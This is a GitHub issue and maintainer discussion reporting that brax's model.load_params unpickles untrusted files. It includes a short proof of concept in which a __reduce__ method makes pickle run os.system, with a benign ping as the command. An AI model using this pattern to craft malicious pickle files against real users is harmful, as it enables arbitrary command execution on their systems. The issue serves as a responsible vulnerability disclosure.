brax
brax copied to clipboard
Insecure Deserialization attack on pickle.loads
I noticed that there is a module named load_params that passes user input directly into pickle , which allows an attacker to execute system commands with insecure deserialization attack on the victim’s system.
Vulnerable Function
https://github.com/google/brax/blob/69637a359463738140c1b850f61ad0088a23538b/brax/io/model.py#L22
Exploit Code (Attacker Side):
import pickle
import os
class MaliciousCode:
def __reduce__(self):
return (os.system, ("ping 'google.com'",))
with open('malicious.pkl', 'wb') as f:
pickle.dump(MaliciousCode(), f)
Exploit Code (Victim Side):
from brax.io import model
model.load_params("malicious.pkl")
Acknowledged, this has been on our TODO for some time. I implemented orbax checkpointing in PPO https://github.com/google/brax/blob/d48b0b373a6478838eac325cadc6d8983837a968/brax/training/agents/ppo/train.py#L534 as a start. But a bigger refactor is needed to bubble up this kind of logic into load_params, since the target state needs to be provided AOT when loading the params.
The flax serializer has a similar requirement, the target needs to be defined AOT. The right thing to do is to perhaps nix model.load_params and save_params altogether, and rely entirely on a flax/nnx/orbax serializer (along with a model config to generate the target pytree).
Happy to review any PRs if someone wants to take a look.
8526f9a64ee02010615a57a026a7b6aad05cbda0 starts to address this, but we likely won't fully deprecate brax.io.model for some time